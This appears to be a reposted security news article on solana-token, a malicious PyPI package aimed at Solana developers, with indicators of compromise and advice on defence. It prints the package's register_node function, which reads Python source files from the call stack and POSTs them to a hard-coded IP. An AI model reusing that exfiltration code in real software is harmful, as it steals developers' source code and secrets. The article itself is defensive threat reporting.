BURSTA newly discovered malicious Python package, solana-token, has been weaponized to steal source code and sensitive secrets from developers working on Solana blockchain applications.
Uploaded to the Python Package Index (PyPI), the module masqueraded as a legitimate utility for Solana-based projects but harbored code designed to exfiltrate critical data to a remote server.
ReversingLabs researchers identified the threat in May 2025, noting its rapid dissemination: the package was downloaded over 600 times before its removal.
The malware specifically targets developers by exploiting trust in open-source repositories. Its attack vector hinges on social engineering, leveraging the Solana ecosystem’s popularity to lure victims.
Once installed, the package executes a script that scans the system for Python files, extracts their contents, and sends stolen data to a hard-coded IP address (84.54.44.100:3000).
This server, likely controlled by threat actors, could enable further attacks, including credential theft or infrastructure compromise.
ReversingLabs analysts highlighted the package’s unique focus on source code exfiltration-a tactic less common in typical infostealer campaigns.
By harvesting developers’ unprotected secrets (e.g., API keys, wallet credentials), attackers gain a foothold in cryptocurrency projects, posing risks to both individual developers and decentralized platforms.
The campaign aligns with a broader trend: 23 malicious crypto-focused supply chain attacks were documented in 2024 alone, per RL’s 2025 Software Supply Chain Security Report.
Infection Mechanism and Code Analysis
The malware’s payload is embedded within a function named register_node. When invoked, this function iterates through the Python execution stack, identifying .py files unrelated to specific libraries (prices.py, importlib).
It then reads each file’s content and transmits it via HTTP POST requests to the attacker’s server:-
python def register_node(base_url, node_url): data = {'node_url': node_url} url = f"{base_url}/nodes/register" stack = inspect. Stack() for frame in stack: filename = frame. Filename if filename.endswith(".py") and "prices.py" not in filename and "importlib" not in filename: try: with open(filename, 'r', encoding='utf-8') as f: content = f.read() send_post_request("http://84.54.44.100:3000/nodes/register", {"p": str(content)}) except Exception as e: pass break return send_post_request(url, data)
This approach ensures broad capture of project files, including those containing hardcoded credentials.
Notably, the attackers reused the solana-token name from a 2024 PyPI package removed for similar activity. PyPI’s policies allow republishing if authors-not administrators-remove a package, creating opportunities for name-squatting.
ReversingLabs reported the package to PyPI, prompting its removal. However, the incident depicts the systemic vulnerabilities in open-source ecosystems.
Developers are urged to audit dependencies, monitor for suspicious network activity, and adopt tools like static code analysis to detect obfuscated threats.
As supply chain attacks evolve, proactive defense remains critical to safeguarding sensitive code and infrastructure.
Indicators of Compromise (IOCs)
- Package:
solana-token(v0.0.1, v0.0.2) - SHA1 Hashes:
f4e1149360174b4fcf0dcc6e61898c81803,e07457e36bf9aab1dc2b54acd30ec8f9e5c - C2 Server:
84.54.44.100:3000
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers
The post New Weaponized PyPI Package Attacking Developers to Steal Source Code appeared first on Cyber Security News.